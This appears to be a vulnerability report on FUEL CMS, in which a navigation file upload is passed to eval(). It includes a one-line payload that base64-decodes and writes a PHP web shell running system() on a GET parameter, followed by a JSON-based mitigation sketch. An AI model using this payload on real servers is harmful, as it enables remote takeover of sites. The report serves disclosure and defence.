upload function:

![c2](https://user-images.githubusercontent.com/9522862/74326673-c3608480-4dc5-11ea-89d8-9246baff623c.png)

`$this->fuel->navigation->upload($params)` was called.

`$this->fuel->navigation->upload` function:

![c3](https://user-images.githubusercontent.com/9522862/74326859-1cc8b380-4dc6-11ea-9695-4dc3963702ca.png)

```php
$file = read_file($file_path);
if (empty($file))
{
	return FALSE;
}
// strip any php tags
$file = str_replace('<?php', '', $file);
// run xss_clean on it
$file = xss_clean($file);
// now evaluate the string to get the nav array
@eval($file);
```

The uploaded code only has its `<?php` tags replaced with spaces and the XSS tags filtered.

![c4](https://user-images.githubusercontent.com/9522862/74327409-1e46ab80-4dc7-11ea-90fa-d24623c02f28.png)

Then the code is executed: `@eval($file);`

So we can construct PHP code to write a webshell to the web directory.

code:

file_put_contents("aaaaaa.php",base64_decode("PD9waHAgc3lzdGVtKCRfR0VUWydpZCddKTs/Pg=="));

Because the `<?php` tag is filtered, we use base64 to encode the command execution code.

Then upload.

Although an error is prompted, our code has been executed, and we can see the generated files on the web and in the directories.
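A mitigation sketch for the import path reported above, as an added example that is not FUEL CMS code or the reporter's: the upload is treated as data and decoded, never evaluated. It assumes the navigation file can be supplied as JSON; the function name `parse_nav_upload` and the field names in `$allowed` are hypothetical.

```php
<?php
// Added example: hypothetical replacement for the eval()-based navigation import.
// Assumption: the upload is JSON, one object per navigation item.

function parse_nav_upload(string $raw): array
{
    // eval() never needed the '<?php' tag, so stripping it restricts nothing.
    // Decoding data cannot execute anything, whatever the file contains.
    try {
        $data = json_decode($raw, true, 8, JSON_THROW_ON_ERROR);
    } catch (JsonException $e) {
        throw new InvalidArgumentException('navigation file is not valid JSON');
    }
    if (!is_array($data)) {
        throw new InvalidArgumentException('navigation file must be a JSON object');
    }

    $allowed = ['label', 'location', 'parent_id', 'precedence']; // assumed field names
    $nav = [];
    foreach ($data as $key => $item) {
        // Item keys must be short, plain identifiers (a JSON list yields int keys).
        if (!is_string($key) || !preg_match('/\A[A-Za-z0-9_\/-]{1,64}\z/', $key)) {
            throw new InvalidArgumentException('invalid navigation key');
        }
        // Each item is an object holding only known fields.
        if (!is_array($item) || array_diff(array_keys($item), $allowed)) {
            throw new InvalidArgumentException("unexpected fields in item '$key'");
        }
        // Field values are bounded scalars, never nested structures.
        foreach ($item as $value) {
            if (!is_scalar($value) || strlen((string) $value) > 255) {
                throw new InvalidArgumentException("invalid value in item '$key'");
            }
        }
        $nav[$key] = $item;
    }
    return $nav;
}

// Constructed sample inputs: one JSON file, one file of PHP source.
$good = '{"about": {"label": "About", "location": "about"}}';
$php  = '$nav["about"] = array("label" => "About");';

var_dump(parse_nav_upload($good));
try {
    parse_nav_upload($php);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```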